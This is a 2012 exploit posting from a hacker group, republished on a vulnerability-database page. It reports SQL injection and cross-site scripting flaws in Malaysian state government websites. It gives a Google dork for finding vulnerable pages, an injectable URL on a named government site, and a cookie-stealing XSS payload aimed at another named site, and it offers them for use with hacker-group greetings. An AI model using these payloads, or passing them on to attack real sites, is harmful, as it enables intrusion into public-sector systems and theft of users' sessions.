Lucene search
K

Ministry Malaysia XSS and SQL Injection Vulnerability

🗓️ 17 Jun 2012 00:00:00Reported by phiAType 
zdt
 zdt
🔗 0day.today👁 216 Views

Ministry Malaysia XSS and SQL Injection Vulnerability on Ministry Malaysia website, critical security ris

Code
 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0      _                   __           __       __                      1
 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
 1                   \ \____/ >> Exploit database separated by exploit    0
 0                    \/___/          type (local, remote, DoS, etc.)     1
 1                                                                        1
 0   [x] Official Website: http://www.1337day.com                         0
 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
 0                                                                        0
 1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              1
 0                   I'm phiA Member From Inj3ct0r TEAM                   1
 1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1

- Use it at your risk,,,
- Made In Indonesia 

---------------------------------------------------------------------------!

# Exploit Title: Ministry Malaysia XSS and SQL Injection Vulnerability
# Date: June 15 . 2012
# Author: phiA

---------------------------------------------------------------------------!

#E-mail : [email protected]
# Category: [webapps] 0day
#Vendor : Ministry Malaysia [owner site]

---------------------------------------------------------------------------!
# Google dork: inurl:/modules/web/page_print.php?id=

#Security risk : Critical
# Tested on: BackTrack 5

---------------------------------------------------------------------------!


#1 Proof OF Concept SQL Injection Vulnerability


a sample from google dork !

http://www.kktpk.sarawak.gov.my/modules/web/page_print.php?id=[sqli]


#2 Proof Of Concept of XSS Vulnerability

a sample from google dork !

http://www.midcom.sarawak.gov.my/modules/web/page.php?id='"<script>alert(document.cookie)</script>


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Thankz to : Indonesian Grey Hat Team, Jakarta Anonymous Club , BlackNewbie Team , Depe , Arai Maulana , n0Xtra , Vicky_cyber , RadityaHN , X-Cisadane , Sany Morphic , all Indonesian Hackers.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Quote:

-Indonesian people here !

-You should have eXpect us !




#  0day.today [2018-01-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Jun 2012 00:00Current
7.1High risk
Vulners AI Score7.1
216